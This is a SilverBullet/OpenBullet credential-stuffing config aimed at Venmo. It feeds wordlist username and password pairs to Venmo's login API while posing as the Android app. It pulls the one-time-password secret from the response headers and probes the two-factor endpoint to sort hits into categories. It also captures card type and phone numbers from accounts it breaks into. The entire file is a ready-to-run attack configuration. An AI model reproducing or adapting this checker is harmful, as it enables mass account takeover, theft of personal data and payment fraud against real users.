[SETTINGS]
{
  "Name": "venmo",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-12T19:54:26.331884+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "venmo",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION GenerateGUID "9019efae-8ef9-4d0e-a4fe-1c870761fc00" -> VAR "gui" 

REQUEST POST "https://api.venmo.com/v1/oauth/access_token" 
  CONTENT "phone_email_or_username=<USER>&password=<PASS>&client_id=4" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Venmo/8.17.2 Android/5.1 HUAWEI/HUAWEI RIO-L01" 
  HEADER "device-id: <gui>" 
  HEADER "X-Venmo-Android-Version-Name: 8.17.2" 
  HEADER "X-Venmo-Android-Version-CODE: 2321" 
  HEADER "application-id: com.venmo" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Accept-Language: fr-FR" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Host: api.venmo.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "Your email or password was incorrect." 
    KEY "Couldn't Log In" 

PARSE "<HEADERS(venmo-otp-secret)>" JSON "" -> VAR "otp" 

REQUEST GET "https://api.venmo.com/v1/account/two-factor/token" 
  
  HEADER "VENMO-OTP-SECRET: <otp>" 
  HEADER "User-Agent: Venmo/8.17.2 Android/5.1 HUAWEI/HUAWEI RIO-L01" 
  HEADER "device-id: <gui>" 
  HEADER "X-Venmo-Android-Version-Name: 8.17.2" 
  HEADER "X-Venmo-Android-Version-CODE: 2321" 
  HEADER "application-id: com.venmo" 
  HEADER "Cache-Control: max-age=0" 
  HEADER "Accept-Language: fr-FR" 
  HEADER "Host: api.venmo.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Resource not found" 
    KEY "title\": \"Error\"" 
  KEYCHAIN Custom "FREE" OR 
    KEY "<SOURCE>" DoesNotContain "question_type\": \"card\"" 
  KEYCHAIN Success OR 
    KEY "question_type\": \"card\"" 

PARSE "<SOURCE>" JSON "value" CreateEmpty=FALSE -> CAP "CCType" 

PARSE "<SOURCE>" LR "\"devices\": [{\"value\": \"" "\"," CreateEmpty=FALSE -> CAP "PhoneNumber" 

